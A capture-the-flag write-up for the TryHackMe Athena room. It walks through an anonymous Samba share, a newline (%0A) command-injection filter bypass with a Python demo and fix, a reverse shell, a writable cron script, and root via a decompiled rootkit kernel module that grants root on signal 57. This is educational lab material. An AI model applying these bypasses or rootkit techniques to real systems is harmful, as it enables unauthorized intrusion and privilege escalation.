TryHackMe : Athena Room (Command Injection)

#$ubh@nk@r
6 min read, Sep 17, 2023


Intro : Hello Hackers, this is my new writeup on the TryHackMe room Athena. After many days I am posting a blog on a CTF again; sorry for the delay. It is a completely new room on TryHackMe in which you will find command injection, a normal privilege escalation and also some reverse engineering. So let’s start.

Nmap Scan :

As usual I start with a default Nmap scan. It shows me 4 open ports: 22 (SSH), 80 (HTTP), 139 and 445 (Samba).

Web Enumeration :

So I first visit the web page and find nothing interesting there. I also find nothing with GoBuster.

So I simply move on to the Samba share and enumerate it.

Samba Enum :

I start by listing all Samba shares with the smbclient utility (-N skips the password prompt, so it tries a null session):

Tip : smbclient -N -L //<ip> (the same thing written with backslashes, smbclient -L \\\\<ip>\\, needs each backslash doubled for the shell)

You can also try smbmap or enum4linux.

Here I find that only the public share is accessible to us, so I jump into it. There I find one important message.

I download it to my VM and check it.

The message talks about a directory, /myrouterpanel. Nice. I visit that panel.

Web Exploitation :

Here it is. It is a page that generates ping requests, so it may be vulnerable to command injection. You know, we all did this before in DVWA, and it is something like that. So I intercept the ping request in Burp Suite and start testing.

Then I start my exploitation step. I try ; & && | || for regular command injection, but they all fail.

So what now? I also try URL-encoding those characters, but that fails too. :) Now I am lost at sea.

Then after some time I read a blog and learn about the newline (\n) character. So I try it: I URL-encode it (%0A) and start testing. At last I simply bypass the filter. The reason it works is that the shell treats a newline as a command separator exactly like ;, so a blocklist that only rejects ; & and | lets %0A through and the text after it runs as a second command.
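An added example (my own Python, not code from the room or from this writeup) that models what the paragraph above describes: a blocklist filter that rejects the usual separators, a handler that concatenates the parameter into a shell command, and the %0A bypass, next to a hardened handler that allowlists the address and never touches a shell. The filter, the handler names and the token list are all constructed for this illustration because the panel’s real source is not shown; echo stands in for ping so the example runs offline.

```python
import re
import subprocess
from urllib.parse import unquote

# Constructed blocklist approximating the panel's filter as the writeup
# describes it: the classic separators are rejected, the newline is not.
BLOCKED_TOKENS = (";", "&", "|", "`", "$(")

def naive_filter_allows(raw_param: str) -> bool:
    """Decode the URL-encoded parameter, then apply the blocklist.

    Decoding first means %3B is caught just like a literal ';', which is why
    URL-encoding the separators did not help; %0A survives because '\\n' is
    simply not on the list.
    """
    decoded = unquote(raw_param)
    return not any(tok in decoded for tok in BLOCKED_TOKENS)

def vulnerable_ping(raw_param: str) -> str:
    """Hypothetical vulnerable handler: the parameter is concatenated into a
    command string that /bin/sh parses. 'echo' replaces 'ping' so the example
    runs offline; the injection behaves identically."""
    if not naive_filter_allows(raw_param):
        return "blocked"
    decoded = unquote(raw_param)
    cmd = f"echo ping -c 1 {decoded}"
    # With shell=True a newline ends the echo command and whatever follows
    # runs as a second command, exactly as ';' would have.
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout

# Dotted-quad IPv4 only; anything else (spaces, newlines, hostnames) is rejected.
IPV4 = re.compile(r"(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)")

def hardened_ping(raw_param: str) -> str:
    """Allowlist the input and never hand it to a shell."""
    decoded = unquote(raw_param)
    if not IPV4.fullmatch(decoded):
        return "invalid address"
    # argv list, no shell: there is no command parser left for a newline or
    # ';' to influence, and the address is one argument however it is spelled.
    result = subprocess.run(["echo", "ping", "-c", "1", decoded],
                            capture_output=True, text=True)
    return result.stdout

if __name__ == "__main__":
    print(vulnerable_ping("127.0.0.1;id"))      # blocked
    print(vulnerable_ping("127.0.0.1%0Aid"))    # echo output followed by id output
    print(hardened_ping("127.0.0.1%0Aid"))      # invalid address
```

The lesson is the one the room teaches: a blocklist of metacharacters is only as complete as the author’s knowledge of the shell’s grammar, whereas validating against the shape you expect and passing an argv list removes the shell from the picture entirely.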

I can easily see the file system. Yaa!!!!

So I use a reverse shell command to get a reverse shell back to my machine.

And I get a shell as www-data.

Privilege Escalation :

So now it is time for some privesc. I run pspy on the victim’s machine to see whether any interesting process is running.

After some time it gives me some results. From these, the ones below seem interesting.

It is running some backup script, and something is being removed.

So I check that script. It looks like this.

It is just a regular backup script. Since we have write permission on it, we can abuse it to get a new shell. Before overwriting it, check with ls -l that www-data can really write to the file; the backup job runs as athena, so whatever we put in the script executes as that user. I replace the script’s contents with a reverse shell command.

And in my new Netcat listener I get a shell as athena. Yessssssss!!!!

Here is the User Flag.

So it is time to get root access. I simply type sudo -l and it gives me something.

So I can run a file called venom.ko with sudo. The .ko extension means it is a loadable kernel module, not an ordinary program: loading it with sudo runs its code inside the kernel. I download the file to my VM and check it. It is an ELF object built from C and assembly code, so we have to decompile it to see the source. I use an online decompiler that works much like Ghidra.

As I am not so expert in reverse engineering, I use ChatGPT to understand the code. In this code we have 2 important functions which can help us get root access: void give_root(void) and int hacked_kill(pt_regs *pt_regs).

So I ask ChatGPT to explain those functions.

void give_root(void)

{
  long lVar1;
  cred *newcreds;

  __fentry__();
  lVar1 = prepare_creds();             /* fresh copy of the calling task's struct cred */
  if (lVar1 != 0) {
    /* struct cred begins with a 4-byte usage count; the four 8-byte stores
       that follow zero the (uid,gid), (suid,sgid), (euid,egid) and
       (fsuid,fsgid) pairs, i.e. every id becomes 0 = root */
    *(undefined8 *)(lVar1 + 4) = 0;
    *(undefined8 *)(lVar1 + 0xc) = 0;
    *(undefined8 *)(lVar1 + 0x14) = 0;
    *(undefined8 *)(lVar1 + 0x1c) = 0;
    commit_creds(lVar1);               /* install the all-root credentials on the caller */
  }
  __x86_return_thunk();
  return;
}

Here is the Explanation.

int hacked_kill(pt_regs *pt_regs)

{
  undefined *puVar1;
  list_head *plVar2;
  int sig;
  int iVar3;
  void *__mptr;
  undefined *puVar4;
  task_struct *p;
  task_struct *task;

  __fentry__();
  plVar2 = module_previous;
  iVar3 = (int)pt_regs->si;                 /* rsi = second argument of kill(): the signal number */
  if (iVar3 == 0x39) {                      /* signal 57: give the calling process root credentials */
    give_root();
    iVar3 = __x86_return_thunk();
    return iVar3;
  }
  if (iVar3 == 0x3f) {                      /* signal 63: toggle hiding the module from the module list */
    if (module_hidden != 0) {
      /* currently hidden: link __this_module back in after module_previous */
      __this_module.list.next = module_previous->next;
      (__this_module.list.next)->prev = &__this_module.list;
      __this_module.list.prev = plVar2;
      module_hidden = 0;
      plVar2->next = (list_head *)0x101008; /* unresolved relocation; from context, &__this_module.list */
      iVar3 = __x86_return_thunk();
      return iVar3;
    }
    /* currently visible: remember our neighbour, unlink ourselves, poison the pointers */
    module_previous = __this_module.list.prev;
    (__this_module.list.next)->prev = __this_module.list.prev;
    (__this_module.list.prev)->next = __this_module.list.next;
    __this_module.list.next = (list_head *)0xdead000000000100;  /* LIST_POISON1 */
    __this_module.list.prev = (list_head *)0xdead000000000122;  /* LIST_POISON2 */
    module_hidden = 1;
    iVar3 = __x86_return_thunk();
    return iVar3;
  }
  if (iVar3 != 0x1f) {                      /* any other signal: hand over to the saved original kill() */
    __x86_indirect_thunk_rax();             /* indirect call through rax (retpoline) */
    iVar3 = __x86_return_thunk();
    return iVar3;
  }
  /* signal 31: walk the task list from init_task looking for the pid passed in rdi */
  puVar4 = &init_task;
  do {
    puVar1 = *(undefined **)(puVar4 + 0x848);        /* task->tasks.next (list_head at offset 0x848) */
    puVar4 = puVar1 + -0x848;                         /* container_of(): back to the task_struct */
    if (puVar1 == &DAT_00102880) goto LAB_001005a5;   /* back at the list head: pid not found */
  } while (*(int *)&pt_regs->di != *(int *)(puVar1 + 0x108));  /* task->pid vs. the pid argument */
  if (puVar4 != (undefined *)0x0) {
    /* toggle one bit in the flags word at task offset 0x2c to hide or unhide that process */
    *(uint *)(puVar1 + -0x81c) = *(uint *)(puVar1 + -0x81c) ^ 0x10000000;
    iVar3 = __x86_return_thunk();
    return iVar3;
  }
LAB_001005a5:
  iVar3 = __x86_return_thunk();
  return iVar3;
}

Here is the Explanation.

In the hacked_kill function, 0x39 and 0x3f are hexadecimal signal numbers: 57 and 63 (and 0x1f is 31). The module replaces the kill system call, so every kill() made on the system passes through this function, and the signal number (the second syscall argument, pt_regs->si) selects what happens: 57 calls give_root() for the calling process, 63 hides or unhides the module itself, 31 hides or unhides the process whose PID was passed as the first argument, and any other signal is forwarded to the real kill. I thought that after loading the module we have to call kill with signal 57 (the PID does not matter for that branch, so kill -57 0 is enough), because in the give_root function, in point 3 of the explanation, it says: It sets the user identifier (uid) and group identifier (gid) fields in the new credentials to 0, effectively making the process's user and group IDs root (superuser).

So we can get root access from here. So let’s try it.

So what it does: it changes the user and group IDs of our existing shell to root’s IDs. That is why the username shown does not change to root, yet we have root privileges and can read the root flag.

And we pwned the machine.

THANKS FOR READING!

If you like it, don’t forget to follow me for more articles.

Happy Hacking~


Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/
